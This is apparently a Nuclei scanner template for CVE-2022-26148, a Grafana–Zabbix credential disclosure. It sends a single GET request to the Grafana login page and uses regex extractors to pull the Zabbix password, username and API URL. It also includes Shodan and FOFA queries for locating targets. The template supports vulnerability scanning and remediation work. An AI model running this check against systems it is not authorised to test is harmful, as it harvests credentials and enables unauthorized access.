id: CVE-2022-26148 info: name: Grafana & Zabbix Integration - Credentials Disclosure author: Geekby severity: critical description: | Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address. impact: | An attacker can obtain sensitive credentials, leading to unauthorized access and potential data breaches. remediation: | Update to the latest version of the Grafana & Zabbix Integration plugin to fix the vulnerability. reference: - https://2k8.org/post-319.html - https://security.netapp.com/advisory/ntap-20220425-0005/ - https://nvd.nist.gov/vuln/detail/CVE-2022-26148 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-26148 cwe-id: CWE-312 epss-score: 0.15727 epss-percentile: 0.95407 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: grafana product: grafana shodan-query: title:"Grafana" fofa-query: app="Grafana" tags: cve,cve2022,grafana,zabbix,exposure http: - method: GET path: - "{{BaseURL}}/login?redirect=%2F" matchers-condition: and matchers: - type: word part: body words: - '"zabbix":' - '"zbx":' - "alexanderzobnin-zabbix-datasource" condition: or - type: regex part: body regex: - '"password":"(.*?)"' - '"username":"(.*?)"' condition: and - type: status status: - 200 extractors: - type: regex group: 1 regex: - '"password":"(.*?)"' - '"username":"(.*?)"' - '"url":"([a-z:/0-9.]+)\/api_jsonrpc\.php' # digest: 4b0a00483046022100f7f4da526f38c8b17bb885b2e3dd9c016d86320eddfbe33aeb2abaf507d984ff022100a57f95477692094e059e9a530a34cc9930e9327820b97d89a872a52b9c6704e0:922c64590222798bb761d5b6d8e72950